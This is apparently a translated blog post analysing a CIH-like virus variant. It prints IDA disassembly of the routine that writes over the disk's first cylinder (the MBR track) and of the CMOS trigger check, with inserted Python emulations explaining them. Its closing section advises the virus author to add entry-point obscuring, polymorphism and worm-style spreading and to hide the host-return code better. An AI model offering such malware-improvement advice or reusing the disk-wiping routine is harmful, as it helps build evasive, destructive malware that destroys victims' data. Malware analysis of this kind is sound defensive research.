Source: haiwei's blog
A while ago a virus called the "new CIH" appeared. I had a quick look at it; below is the IDA disassembly of the virus.
1. Most of it is the same as the original CIH: it goes to Ring0 (very unstably), flashes the BIOS and writes to the hard disk. Infecting an EXE does not increase the file size.
The hard-disk write code (风般's article already describes it in detail). Note that the routine the listing labels AccessDisk, at the top, does no disk I/O at all: it is a helper that case-folds the four bytes of EAX (add al,20h for any byte in 'A'..'Z', with ror eax,8 bringing the next byte into AL). The actual port I/O to the ATA controller starts at 417E99.
.text:00417E7C AccessDisk proc near ; CODE XREF: .text:00417A65p
.text:00417E7C ; .text:00417A79p ...
.text:00417E7C 51 push ecx
.text:00417E7D 6A 04 push 4
.text:00417E7F 59 pop ecx
.text:00417E80
.text:00417E80 loc_417E80: ; CODE XREF: AccessDisk+19j
.text:00417E80 3C 41 cmp al, 41h
.text:00417E82 72 0E jb short loc_417E92
.text:00417E84 90 nop
.text:00417E85 90 nop
.text:00417E86 90 nop
.text:00417E87 90 nop
.text:00417E88 3C 5A cmp al, 5Ah
.text:00417E8A 77 06 ja short loc_417E92
.text:00417E8C 90 nop
.text:00417E8D 90 nop
.text:00417E8E 90 nop
.text:00417E8F 90 nop
.text:00417E90 04 20 add al, 20h
.text:00417E92
.text:00417E92 loc_417E92: ; CODE XREF: AccessDisk+6j
.text:00417E92 ; AccessDisk+Ej
.text:00417E92 C1 C8 08 ror eax, 8
.text:00417E95 E2 E9 loop loc_417E80
.text:00417E97 59 pop ecx
.text:00417E98 C3 retn
.text:00417E98 AccessDisk endp
.text:00417E98
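The routine above that the listing labels AccessDisk never touches the disk. Replayed in Python as an added example (this is not code from the post or from the virus), it walks the four bytes of EAX with ror eax,8 and adds 20h to any byte in 'A'..'Z', i.e. it case-folds a packed 4-byte string such as a file extension. The sample inputs are constructed.

```python
# Added example (not from the original post): re-implementation of the loop at
# 00417E80 that IDA labels "AccessDisk", to show what it actually computes.

MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """ror eax, bits on a 32-bit register."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def access_disk(eax: int) -> int:
    """Emulates: push 4 / pop ecx ; loop: cmp al,41h / jb ; cmp al,5Ah / ja ;
    add al,20h ; ror eax,8 ; loop. After four rotations by 8 the register is
    back in its original byte order, with every 'A'..'Z' byte lowercased."""
    eax &= MASK32
    for _ in range(4):
        al = eax & 0xFF
        if 0x41 <= al <= 0x5A:                      # 'A'..'Z'
            eax = (eax & 0xFFFFFF00) | (al + 0x20)  # add al, 20h
        eax = ror32(eax, 8)                         # next byte into AL
    return eax


def dword_from_ascii(text: bytes) -> int:
    """Little-endian dword, as the CPU would load it from a string in memory."""
    return int.from_bytes(text.ljust(4, b"\0")[:4], "little")


def ascii_from_dword(eax: int) -> bytes:
    return (eax & MASK32).to_bytes(4, "little")


if __name__ == "__main__":
    # Constructed samples: an extension, mixed case, and bytes just outside 'A'..'Z'.
    for sample in (b".EXE", b"ExE\0", b"A@[Z"):
        folded = ascii_from_dword(access_disk(dword_from_ascii(sample)))
        print(f"{sample!r:10} -> {folded!r}")
```

Bytes 40h ('@') and 5Bh ('[') sit just outside the range and pass through unchanged, which is the reason for the two compares rather than a single subtract.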
.text:00417E99 ; ---------------------------------------------------------------------------
.text:00417E99 66 BA F6 01 mov dx, 1F6h
.text:00417E9D B0 A0 mov al, 0A0h
.text:00417E9F EE out dx, al ; AT hard disk controller:
.text:00417E9F ; Drive & Head.
.text:00417E9F ; Read/Write: bits indicate head, drive for operation
.text:00417EA0
.text:00417EA0 loc_417EA0: ; CODE XREF: .text:00417EC8j
.text:00417EA0 FF 85 3B F7 FF FF inc dword ptr [ebp-8C5h]
.text:00417EA6 8A 85 3B F7 FF FF mov al, [ebp-8C5h]
.text:00417EAC 3C 3F cmp al, 3Fh
.text:00417EAE 74 0A jz short loc_417EBA
.text:00417EB0 90 nop
.text:00417EB1 90 nop
.text:00417EB2 90 nop
.text:00417EB3 90 nop
.text:00417EB4 75 14 jnz short loc_417ECA
.text:00417EB6 90 nop
.text:00417EB7 90 nop
.text:00417EB8 90 nop
.text:00417EB9 90 nop
.text:00417EBA
.text:00417EBA loc_417EBA: ; CODE XREF: .text:00417EAEj
.text:00417EBA 33 C0 xor eax, eax
.text:00417EBC 89 85 3B F7 FF FF mov [ebp-8C5h], eax
.text:00417EC2 FF 85 3F F7 FF FF inc dword ptr [ebp-8C1h]
.text:00417EC8 EB D6 jmp short loc_417EA0
.text:00417ECA ; ---------------------------------------------------------------------------
.text:00417ECA
.text:00417ECA loc_417ECA: ; CODE XREF: .text:00417EB4j
.text:00417ECA 66 BA F2 01 mov dx, 1F2h
.text:00417ECE EE out dx, al ; AT hard disk controller:
.text:00417ECE ; Sector count.
.text:00417ECE ; Read/Write count of sectors for operation
.text:00417ECF 66 BA F3 01 mov dx, 1F3h
.text:00417ED3 8A 85 3F F7 FF FF mov al, [ebp-8C1h]
.text:00417ED9 EE out dx, al ; AT hard disk controller:
.text:00417ED9 ; Sector number.
.text:00417ED9 ; Read/Write current/starting logical sector number
.text:00417EDA 66 BA F4 01 mov dx, 1F4h
.text:00417EDE 32 C0 xor al, al
.text:00417EE0 EE out dx, al ; AT hard disk controller:
.text:00417EE0 ; Cylinder low (bits 0-7 of 10-bit cylinder number)
.text:00417EE1 66 BA F5 01 mov dx, 1F5h
.text:00417EE5 32 C0 xor al, al
.text:00417EE7 EE out dx, al ; AT hard disk controller:
.text:00417EE7 ; Cylinder high (bits 0-1 are bits 8-9 of 10-bit cylinder number)
.text:00417EE8 66 BA F7 01 mov dx, 1F7h
.text:00417EEC B0 30 mov al, 30h
.text:00417EEE EE out dx, al ; AT hard disk
.text:00417EEE ; command register:
.text:00417EEE ; 1xH = Restore to cylinder 0
.text:00417EEE ; 7xH = Seek to cylinder
.text:00417EEE ; 2xH = Read sector
.text:00417EEE ; 3xH = Write sector
.text:00417EEE ; 50H = Format track
.text:00417EEE ; 4xH = verify read
.text:00417EEE ; 90H = diagnose
.text:00417EEE ; 91H = set parameters for drive
.text:00417EEF
.text:00417EEF loc_417EEF: ; CODE XREF: .text:00417EF2j
.text:00417EEF EC in al, dx ; AT hard disk
.text:00417EEF ; status register bits:
.text:00417EEF ; 0: 1=prev cmd error
.text:00417EEF ; 2: Corrected data
.text:00417EEF ; 3: Data Request. Buffer is busy
.text:00417EEF ; 4: Seek completed
.text:00417EEF ; 5: Write fault
.text:00417EEF ; 6: Drive ready (unless bit 4=0)
.text:00417EEF ; 7: Busy
.text:00417EF0 A8 08 test al, 8
.text:00417EF2 74 FB jz short loc_417EEF
.text:00417EF4 66 B8 C8 00 mov ax, 0C8h
.text:00417EF8
.text:00417EF8 loc_417EF8: ; CODE XREF: .text:00417F11j
.text:00417EF8 66 B9 0C 00 mov cx, 0Ch
.text:00417EFC 66 8D B5 2D F7 FF+ lea si, [ebp-8D3h]
.text:00417F03 66 BA F0 01 mov dx, 1F0h
.text:00417F07 FA cli
.text:00417F08 F3 66 6F rep outsw
.text:00417F0B FB sti
.text:00417F0C 66 48 dec ax
.text:00417F0E 66 85 C0 test ax, ax
.text:00417F11 74 E5 jz short loc_417EF8
.text:00417F13 33 C0 xor eax, eax
.text:00417F15 50 push eax
.text:00417F16 FF 95 ED F8 FF FF call dword ptr [ebp-713h]
.text:00417F16 ; ---------------------------------------------------------------------------
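To see where on the disk the writes above land, here is an added example (not code from the post or from the virus): a small model of the ATA primary-channel task file, ports 1F2h..1F7h, driven with exactly the port writes the listing performs between 00417E99 and 00417EEE. The two counters model the stack variables [ebp-8C5h] and [ebp-8C1h]; the listing does not show their initial values, so starting them at zero is an assumption.

```python
# Added example (not from the original post): replay of the task-file writes at
# 00417E99..00417EEE against a model of the ATA command-block registers.

ATA_PORTS = {
    0x1F2: "sector_count",
    0x1F3: "sector_number",
    0x1F4: "cylinder_low",
    0x1F5: "cylinder_high",
    0x1F6: "drive_head",
    0x1F7: "command",
}

# ATA-1 command families; the upper nibble of the command byte selects the family.
COMMAND_FAMILIES = {0x10: "RECALIBRATE", 0x20: "READ SECTORS",
                    0x30: "WRITE SECTORS", 0x40: "READ VERIFY",
                    0x50: "FORMAT TRACK", 0x70: "SEEK"}


class AtaTaskFile:
    """Records `out dx, al` writes to the task file and decodes each command."""

    def __init__(self):
        self.regs = {name: 0 for name in ATA_PORTS.values()}
        self.commands = []

    def out(self, port, al):
        name = ATA_PORTS[port]
        self.regs[name] = al & 0xFF
        if name == "command":
            self.commands.append(self.decode(al & 0xFF))

    def decode(self, cmd):
        dh = self.regs["drive_head"]
        return {
            "name": COMMAND_FAMILIES.get(cmd & 0xF0, "UNKNOWN"),
            "drive": "slave" if dh & 0x10 else "master",   # bit 4 = DRV
            "lba": bool(dh & 0x40),                        # bit 6 = LBA mode
            "head": dh & 0x0F,
            "cylinder": (self.regs["cylinder_high"] << 8) | self.regs["cylinder_low"],
            "sector": self.regs["sector_number"],
            "count": self.regs["sector_count"] or 256,     # a count of 0 means 256
        }


def replay_write_loop(calls, counter=0, sector=0):
    """Runs `calls` entries into the block at 00417E99 and returns the decoded
    commands. `counter` stands for [ebp-8C5h], `sector` for [ebp-8C1h]
    (initial values assumed to be zero)."""
    tf = AtaTaskFile()
    for _ in range(calls):
        tf.out(0x1F6, 0xA0)            # 1F6h <- A0h: master drive, CHS, head 0
        while True:                    # loc_417EA0
            counter += 1               # inc dword ptr [ebp-8C5h]
            if counter != 0x3F:        # cmp al,3Fh / jnz loc_417ECA
                break
            counter = 0                # loc_417EBA: wrap the counter,
            sector += 1                # bump the sector number and go round again
        tf.out(0x1F2, counter)         # 1F2h <- sector count
        tf.out(0x1F3, sector)          # 1F3h <- starting sector number
        tf.out(0x1F4, 0)               # 1F4h <- cylinder low
        tf.out(0x1F5, 0)               # 1F5h <- cylinder high
        tf.out(0x1F7, 0x30)            # 1F7h <- 30h WRITE SECTORS
    return tf.commands


if __name__ == "__main__":
    for i, cmd in enumerate(replay_write_loop(64), 1):
        print(f"call {i:2}: {cmd['name']} drive={cmd['drive']} C={cmd['cylinder']} "
              f"H={cmd['head']} S={cmd['sector']} count={cmd['count']}")
```

Every command targets cylinder 0, head 0 of the primary master, the track that holds the MBR and partition table; with zero-initialised variables the first 62 commands carry sector number 0, which is not a valid CHS sector (they count from 1), and how a drive reacts to that is drive-specific. Note also that, as listed, the data loop at 417EF8 sends only 12 words from [ebp-8D3h] and then falls through on the first pass, because its back-edge is jz (74 E5) rather than jnz, while the controller expects 256 words per sector.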
2. Trigger condition. Judging from the code below, the trigger is very hard to satisfy. The sequence selects CMOS register 16h through port 70h and reads it into AH, then selects register 10h and reads it into AL, and tests AX against 0926h. The original CIH used exactly this instruction pattern with AX = 0708h and 0426h, i.e. it read the RTC month (08h) and day (07h) and compared them with 26 April. Here the indices 16h and 10h are the high byte of the base-memory size and the floppy drive type on a standard CMOS map, so the author probably meant to read the CMOS clock and passed the wrong register numbers, unless it was written this way on purpose.
loc_417D9F: ; CODE XREF: .text:00417B8Cj
.text:00417D9F ; .text:00417D86j ...
.text:00417D9F 66 B8 16 10 mov ax, 1016h
.text:00417DA3 E6 70 out 70h, al ; CMOS Memory:
.text:00417DA3 ; Base memory size
.text:00417DA5 E4 71 in al, 71h ; CMOS Memory
.text:00417DA7 86 E0 xchg ah, al
.text:00417DA9 E6 70 out 70h, al ; CMOS Memory:
.text:00417DA9 ; used by real-time clock
.text:00417DAB E4 71 in al, 71h ; CMOS Memory
.text:00417DAD 66 35 26 09 xor ax, 926h
.text:00417DB1 0F 85 9A 00 00 00 jnz loc_417E51
.text:00417DB7 9C pushf
.text:00417DB8 60 pusha
.text:00417DB9 8B F5 mov esi, ebp
.text:00417DBB BF 4C 38 00 80 mov edi, 8000384Ch
.text:00417DC0 66 BD F8 0C mov bp, 0CF8h
.text:00417DC4 66 BA FE 0C mov dx, 0CFEh
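The trigger test at 00417D9F replayed in Python as an added example (not code from the post or from the virus): a model of the CMOS index/data port pair (70h/71h) runs the same seven-instruction pattern with the new variant's constants and with the original CIH's constants (mov ax,0708h ... xor ax,0426h), so the registers each one actually reads are visible. Register indices follow the standard AT CMOS map; the CMOS contents are constructed.

```python
# Added example (not from the original post): replay of the CMOS trigger check
# at 00417D9F against a simulated CMOS image.

# Standard AT CMOS map entries used by the two checks (RTC values are BCD).
RTC_DAY_OF_MONTH = 0x07
RTC_MONTH        = 0x08
FLOPPY_TYPES     = 0x10
BASE_MEM_HIGH    = 0x16


class Cmos:
    """Index/data port model: `out 70h, al` selects a register, `in al, 71h` reads it."""

    def __init__(self, image):
        self.image = dict(image)
        self.index = 0

    def out_70(self, al):
        self.index = al & 0x7F          # bit 7 is the NMI mask, not part of the index

    def in_71(self):
        return self.image.get(self.index, 0x00)


def cih_trigger_check(cmos, select_ax, expected_ax):
    """Emulates:
        mov ax, select_ax ; out 70h, al ; in al, 71h ; xchg ah, al
        out 70h, al ; in al, 71h ; xor ax, expected_ax ; jnz no_trigger
    Returns (fires, index_read_into_ah, index_read_into_al, ax_value)."""
    ah, al = select_ax >> 8, select_ax & 0xFF
    cmos.out_70(al)                     # first select: low byte of AX
    al = cmos.in_71()
    ah, al = al, ah                     # xchg ah, al: value -> AH, old AH -> AL
    cmos.out_70(al)                     # second select: high byte of the original AX
    al = cmos.in_71()
    ax = (ah << 8) | al
    return (ax ^ expected_ax) == 0, select_ax & 0xFF, select_ax >> 8, ax


def original_cih_fires(cmos):
    return cih_trigger_check(cmos, 0x0708, 0x0426)     # month 04h, day 26h


def new_cih_fires(cmos):
    return cih_trigger_check(cmos, 0x1016, 0x0926)     # CMOS[16h] == 09h, CMOS[10h] == 26h


# Constructed sample image: RTC reads 26 April, drive A: is a 1.44 MB floppy
# (type 4 in the high nibble), base memory 640 KB (0280h, high byte 02h).
SAMPLE_CMOS = {RTC_DAY_OF_MONTH: 0x26, RTC_MONTH: 0x04,
               FLOPPY_TYPES: 0x40, BASE_MEM_HIGH: 0x02}

if __name__ == "__main__":
    for name, check in (("original CIH", original_cih_fires), ("new CIH", new_cih_fires)):
        fires, ah_idx, al_idx, ax = check(Cmos(SAMPLE_CMOS))
        print(f"{name:12}: AH<-CMOS[{ah_idx:02X}h] AL<-CMOS[{al_idx:02X}h] "
              f"AX={ax:04X}h fires={fires}")
```

On the sample image the original check fires (26 April) while the new one does not: it would need the base-memory high byte to read 09h and the floppy-type byte to read 26h, a combination no normal machine has, which is what makes the trigger so hard to reach.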
3. A few suggestions for the author :)
a. Add some EPO (entry-point obscuring); as it stands it is far too bare.
b. Add some simple polymorphism (skip anything too complex, it is tiring to analyse ^_^).
c. Could you leave out the destructive part? And if you must keep it, at least make it gentler.
d. Borrow some worm techniques so that it spreads further.
e. Hide the code that returns to the original host deeper.
.text:00417657 loc_417657: ; CODE XREF: start+1Bj
.text:00417657 ; start+56j ...
.text:00417657 81 ED A8 77 01 00 sub ebp, 177A8h
.text:0041765D 81 C5 62 F6 00 00 add ebp, 0F662h ; original host entry point, far too obvious
.text:00417663 55 push ebp
.text:00417664 C3 retn